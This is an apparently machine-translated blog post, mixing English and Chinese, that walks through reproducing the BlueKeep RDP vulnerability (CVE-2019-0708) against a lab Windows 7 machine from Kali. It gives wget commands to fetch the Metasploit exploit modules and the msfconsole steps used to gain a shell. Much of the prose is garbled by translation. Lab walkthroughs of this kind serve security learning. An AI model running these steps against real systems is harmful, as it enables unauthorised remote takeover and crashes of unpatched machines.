CVE-2019-0708 exploits reproducibility

Others 2019-11-14 12:55:38 views: null

CVE-2019-0708 exploits reproducibility

This vulnerability burst out from there for several months, until busy did not have time to write the document, now re-do it again.

Prepare the environment:
win7靶机 IP地址:172.16.15.118
Kali攻击机 IP地址:172.16.15.50

It should be reminded that msf tools on the machine to the latest kali, or load cve-2019-0708, when the module will not see

Download Vulnerability module
# 直接在kali中使用命令下载
wget https://raw.githubusercontent.com/rapid7/metasploitframework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
Once you have downloaded the file as follows:

1573702325703

Move the file to the specified location:
rdp.rb 移动到 /usr/share/metasploit-framework/lib/msf/core/exploit 目录

rdp_scanner.rb和cve_2019_0708_bluekeep.rb放到/usr/share/metasploitframework/modules/auxiliary/scanner/rdp 目录

cve_2019_0708_bluekeep_rce.rb 放进/usr/share/metasploitframework/modules/exploits/windows/rdp 目录,这里需要注意如果没有rdp这个目录就去创建个。

Environmental ready

Exploit

Msfconsole first enter into the framework msf attack

1573702498628

Enter reload_all the module is reloaded

1573702681465

Enter search cve-2019-0708 vulnerability query module we are going to use

1573702753955

Our vulnerability module has been successfully loaded into it

By use exploit / windows / rdp / cve_2019_0708_bluekeep_rce command module call

After entering the module inputs show options we need to set the parameters view

1573702904605

If you do not know the specific value of the parameter, then allows you to see through the show command

The setting:

设置靶机IP地址:set RHOSTS 172.16.15.118
设置攻击端口:set rport 3389
设置targets ID:set target 4

1573703184626

Use run command to attack or exploit

1573703257028

See here, we have successfully acquired the target of the shell

Summary and issues:

1. When the vulnerability that an attack is very easy to hit the drone will blue screen if you try several times without success, but not during the test on computer services

2. Loading Vulnerability module when it is loaded if not, it will be updated to the latest msf, re-copy the download again

Guess you like

Origin www.cnblogs.com/yanlzy/p/11856091.html
Recommended
NetBSD bans submission of code generated by AI
Ranking
Talk dubbo of LRUCache
Chapter 1 Learning Summary
Introduction to Virtualization
pytorch 调用lstm
Six modules
[8086] The natural number of 1 to 36 into a 6x6 two-dimensional array of line-sequentially, and then print out the lower left half of the triangular array
mybatis mapper mapping file $ # {} {} understanding and
C language input and output buffer
c language floating-point input and output
andorid P version compatible, refer to Huawei
Daily
More
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)

Code World

© 2018 codetd.com